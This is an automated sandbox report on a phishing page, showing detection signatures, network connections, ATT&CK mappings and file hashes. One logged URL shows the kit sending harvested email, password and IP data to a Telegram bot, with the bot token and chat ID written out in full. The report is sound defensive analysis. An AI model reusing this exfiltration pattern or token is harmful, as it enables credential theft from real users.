Windows
Analysis Report
https://savory-sweet-felidae-psrnd.glitch.me/
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5684 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 6212 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2088 --fi eld-trial- handle=204 0,i,198188 1385979211 426,808446 0944875189 349,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- chrome.exe (PID: 6104 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://savor y-sweet-fe lidae-psrn d.glitch.m e/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security | ||
JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T18:22:40.226205+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:41.221243+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49839 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:52.267650+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49911 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:53.230796+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49918 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:23:07.484471+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50004 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:23:08.458487+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 50006 | 149.154.167.220 | 443 | TCP |
Click to jump to signature section
Phishing |
---|
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Joe Sandbox AI: |
Source: | Joe Sandbox AI: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Classification label: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 2 Browser Extensions | 1 Process Injection | 1 Process Injection | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 1 Ingress Tool Transfer | Scheduled Transfer | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
nordicplow.com | 192.124.249.155 | true | true | unknown | |
www.google.com | 142.250.186.164 | true | false | high | |
api.ipify.org | 104.26.12.205 | true | false | high | |
upload.wikimedia.org | 185.15.59.240 | true | false | high | |
savory-sweet-felidae-psrnd.glitch.me | 34.233.109.53 | true | false | unknown | |
api.telegram.org | 149.154.167.220 | true | false | high | |
www.nordicplow.com | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false |
| unknown | |
false | unknown | ||
false |
| unknown | |
true | unknown | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
34.233.109.53 | savory-sweet-felidae-psrnd.glitch.me | United States | 14618 | AMAZON-AESUS | false | |
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false | |
192.124.249.155 | nordicplow.com | United States | 30148 | SUCURI-SECUS | true | |
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
185.15.59.240 | upload.wikimedia.org | Netherlands | 14907 | WIKIMEDIAUS | false | |
142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.6 |
192.168.2.24 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1591150 |
Start date and time: | 2025-01-14 18:21:23 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | browseurl.jbs |
Sample URL: | https://savory-sweet-felidae-psrnd.glitch.me/ |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.phis.troj.win@17/21@20/9 |
- Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 142.250.74.195, 142.250.185.110, 142.251.168.84, 142.250.186.78, 142.250.185.238, 142.250.184.206, 142.250.184.234, 216.58.206.74, 172.217.16.202, 142.250.186.42, 216.58.212.170, 172.217.18.10, 142.250.185.234, 216.58.212.138, 142.250.185.74, 142.250.186.74, 142.250.186.170, 142.250.185.138, 142.250.185.202, 142.250.185.106, 172.217.18.106, 142.250.185.170, 199.232.210.172, 2.23.77.188, 172.217.16.206, 142.250.184.227, 13.107.246.45, 184.28.90.27, 20.109.210.53
- Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
- Not all processes where analyzed, report is missing behavior information
- VT rate limit hit for: https://savory-sweet-felidae-psrnd.glitch.me/
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5094 |
Entropy (8bit): | 4.834039771497343 |
Encrypted: | false |
SSDEEP: | 96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus |
MD5: | A8FEAF8EA80C17228A67DFEB1E251D8F |
SHA1: | 38A4598BA356C8E43E6A6EA2E59587AB76D26A05 |
SHA-256: | 35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3 |
SHA-512: | 0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 5875 |
Entropy (8bit): | 4.39212305369154 |
Encrypted: | false |
SSDEEP: | 96:8N+TMXNrFL8FkV8FkPFi3mJBpRPaVO5jxJIs1V6osNv6D7RnsDJdiQlXMz:8N3RFL8FkV8FkPFi3mJ1EOvJIOsNixnR |
MD5: | 19F710D6BBAE893DE88DB51707251AA1 |
SHA1: | 7225538EAE4CA0847E5DD57C2886813AC1512DE9 |
SHA-256: | B48FCD71F2AB56C8722C9AA9857E0559290E2240296026ABCD62CC055A8ABFBE |
SHA-512: | BC129124EE0453C5F421FE462A10CBED0E3C4535FA13E8176FB4C643965AB215F32F5B7D839D809763899F08C33BE38D3CCBAD0AD7429B474BE9AA3AD8C251AC |
Malicious: | false |
Reputation: | low |
URL: | https://www.nordicplow.com/wp-admin/includes/fotex.html |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 272 |
Entropy (8bit): | 4.825230707379318 |
Encrypted: | false |
SSDEEP: | 6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY |
MD5: | 363FDD53D34303B727D9DAB161B8E88B |
SHA1: | 5B170117926AE5A5E451AA24676B5A124C2FA122 |
SHA-256: | 3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282 |
SHA-512: | 6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 478 |
Entropy (8bit): | 5.1929010900410555 |
Encrypted: | false |
SSDEEP: | 12:YKOHu/P8jTfUiUa3XHJZjxAqWEW4fJm8x2BumEMVEiWGUfh4bROC79:YKOHbH3UaHJh6qWKRmM2BnjVEMbROC79 |
MD5: | E817B40200087645E44855E6DC31DE76 |
SHA1: | DAAF7F2EC59C8B21A77B427357E48CF619425F94 |
SHA-256: | 0052E4CD8C929640E465F6BEF22DBF98C81A811699C99962E122CED9C9CA966A |
SHA-512: | D872366158FAE25C835087CD69367EA3DCC9CE2CE411ADB06066A995E74606207704DDF57359A0CEECD9BF1BAEDFD61567D14358D68A22DDD74BC57AF5A59656 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 1266 |
Entropy (8bit): | 4.169347964818518 |
Encrypted: | false |
SSDEEP: | 24:hYkCLHqt4gp0gJexFU5Jy+pMcnVsBifqA4No:gis/U5Jy9MAiwNo |
MD5: | 548469B1563D7E4026CDB3357654DEDF |
SHA1: | DF2C4AEF8939A8B4B40C64DD4374F75B8375E984 |
SHA-256: | DD36263940485121EBA7400AEBCAB21EC12168EE5FD1C21473DEEB44E05DCBFB |
SHA-512: | 328073DEA640C50B647A9A5FD36AD4C2260322D9BD2D038516B4AD089922A4ACF887E8FA0EFDDA02704629033FD4248EDD5EAC0DC497AF58F0FD6EF70E01428D |
Malicious: | false |
Reputation: | low |
URL: | https://savory-sweet-felidae-psrnd.glitch.me/ |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4119 |
Entropy (8bit): | 7.949120703870044 |
Encrypted: | false |
SSDEEP: | 96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd |
MD5: | 000BF649CC8F6BF27CFB04D1BCDCD3C7 |
SHA1: | D73D2F6D74EC6CDCBAE07955592962E77D8AE814 |
SHA-256: | 6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0 |
SHA-512: | 73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 28 |
Entropy (8bit): | 4.378783493486175 |
Encrypted: | false |
SSDEEP: | 3:qinPt:qyPt |
MD5: | 4C42AB4890733A2B01B1B3269C4855E7 |
SHA1: | 5B68BFE664DCBC629042EA45C23954EEF1A9F698 |
SHA-256: | F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010 |
SHA-512: | 0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C |
Malicious: | false |
Reputation: | low |
URL: | https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwne-Yjvve0itBIFDYOoWz0SBQ3OQUx6?alt=proto |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 4119 |
Entropy (8bit): | 7.949120703870044 |
Encrypted: | false |
SSDEEP: | 96:h3bdWfcmTY+aRF1pXWZL2+42HGhIUc8KeLEd:hgXTY+as02mOB8XLEd |
MD5: | 000BF649CC8F6BF27CFB04D1BCDCD3C7 |
SHA1: | D73D2F6D74EC6CDCBAE07955592962E77D8AE814 |
SHA-256: | 6BDB369337AC2496761C6F063BFFEA0AA6A91D4662279C399071A468251F51F0 |
SHA-512: | 73D2EA5FFC572C1AE73F37F8F0FF25E945AFEE8E077B6EE42CE969E575CDC2D8444F90848EA1CB4D1C9EE4BD725AEE2B4576AFC25F17D7295A90E1CBFE6EDFD5 |
Malicious: | false |
Reputation: | low |
URL: | https://www.nordicplow.com/wp-includes/images/w-logo-blue-white-bg.png |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 478 |
Entropy (8bit): | 5.190099914260619 |
Encrypted: | false |
SSDEEP: | 12:YKOHu/PNjTfUiUa3XHJZjxAqWEW48x2BumEMVEiWGUfh4bROC79:YKOHqH3UaHJh6qWKM2BnjVEMbROC79 |
MD5: | 75E4BFD3BB817395498D9D9D1DFC87C0 |
SHA1: | BA41E64C9452A41DFD8875A54C902FABFA843EC3 |
SHA-256: | B62E85C70293867DC36778E3D1A4660A6800BB12218074FA032F7F910C929743 |
SHA-512: | 5018CB7DE1212D762BD86539AA3AAF93237E5EE5E1BD725B40A1E4100788378F52153A75DDDC3D94B431AE884E5B688338E4411BBC276E6E1B1EF934B5023D35 |
Malicious: | false |
Reputation: | low |
URL: | https://api.telegram.org/bot6922366229:AAH9bKIYkg1YGgNut2TQso3nTKvv6FyhzrU/sendMessage?chat_id=6328410070&text=*****%20TX40%20Adobe%20R%CD%8Fe%CD%8Fs%CD%8Fu%CD%8Fl%CD%8Ft%CD%8F%20*****%0AEmail%3A%20q4ft2u%40ngw.net%0APassword%3A%20G_%40s)w%3FufRY%0AIP%3A%208.46.123.189 |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 5094 |
Entropy (8bit): | 4.834039771497343 |
Encrypted: | false |
SSDEEP: | 96:5NfSH5pziTJNziTzJgaH+PRpJM+GKq4MsB4Hz7oG9fpdOiXlj8Hdaus:jo+TSTFgaePjC+GKx4T7okHONaus |
MD5: | A8FEAF8EA80C17228A67DFEB1E251D8F |
SHA1: | 38A4598BA356C8E43E6A6EA2E59587AB76D26A05 |
SHA-256: | 35F933EFDC4AC3426775ABF70B002C39D5A9D98B343A11E44A21EB3D0C952FD3 |
SHA-512: | 0E969BAB0E5338E0EEC990D39A01D13BB88A687EF4986FC1407C2416014179A4D15BDD61074441014487E4E978D1025FE9B6A1D16BFDE3CD706B0F6073C6C094 |
Malicious: | false |
Reputation: | low |
URL: | https://upload.wikimedia.org/wikipedia/commons/8/87/PDF_file_icon.svg |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 21 |
Entropy (8bit): | 3.594465636961452 |
Encrypted: | false |
SSDEEP: | 3:YMb1gXME2Y:YMeX32Y |
MD5: | 909AD59B6307B0CD8BFE7961D4B98778 |
SHA1: | 49F8111D613317EA86C6A45CD608DC96B1C8451B |
SHA-256: | FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829 |
SHA-512: | 8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8 |
Malicious: | false |
Reputation: | low |
URL: | https://api.ipify.org/?format=json |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 272 |
Entropy (8bit): | 4.825230707379318 |
Encrypted: | false |
SSDEEP: | 6:tI9mc4sl3u7Ee/Uw4tzC/CHftwHK32KHzCF3cHoKgwHKY:t41uwPwge/CHFyKGKHeVpyKY |
MD5: | 363FDD53D34303B727D9DAB161B8E88B |
SHA1: | 5B170117926AE5A5E451AA24676B5A124C2FA122 |
SHA-256: | 3D41251F93127B4B42C2F69FA423D204946CF9C307D786EA36B8D9BEF4179282 |
SHA-512: | 6369E9E3B0F49D5BE6C43724C01D34E7B9871E9D709C628ED0963B94183729AABB2D9778EED4405D87C5080DEA19156970DAB6B8D69EDB860ADC5C1A400FAFB3 |
Malicious: | false |
Reputation: | low |
URL: | https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 21 |
Entropy (8bit): | 3.594465636961452 |
Encrypted: | false |
SSDEEP: | 3:YMb1gXME2Y:YMeX32Y |
MD5: | 909AD59B6307B0CD8BFE7961D4B98778 |
SHA1: | 49F8111D613317EA86C6A45CD608DC96B1C8451B |
SHA-256: | FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829 |
SHA-512: | 8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8 |
Malicious: | false |
Reputation: | low |
Preview: |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T18:22:40.226205+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49831 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:41.221243+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49839 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:52.267650+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49911 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:22:53.230796+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 49918 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:23:07.484471+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 50004 | 149.154.167.220 | 443 | TCP |
2025-01-14T18:23:08.458487+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.6 | 50006 | 149.154.167.220 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 18:22:08.150985003 CET | 49673 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:08.150999069 CET | 49674 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:08.463465929 CET | 49672 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:17.807092905 CET | 49674 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:17.822329998 CET | 49673 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:18.102236986 CET | 49672 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:19.739481926 CET | 443 | 49698 | 173.222.162.64 | 192.168.2.6 |
Jan 14, 2025 18:22:19.739573002 CET | 49698 | 443 | 192.168.2.6 | 173.222.162.64 |
Jan 14, 2025 18:22:21.860955000 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:21.860994101 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:21.861071110 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:21.861293077 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:21.861310005 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.511029959 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.511326075 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:22.511353970 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.512888908 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.512960911 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:22.514364958 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:22.514458895 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.555048943 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:22.555064917 CET | 443 | 49707 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:22:22.601917982 CET | 49707 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:22:23.380209923 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:23.380250931 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:23.380399942 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:23.380857944 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:22:23.380937099 CET | 443 | 49716 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:22:23.381006956 CET | 49716 | 443 | 192.168.2.6 | 34.233.109.53 |
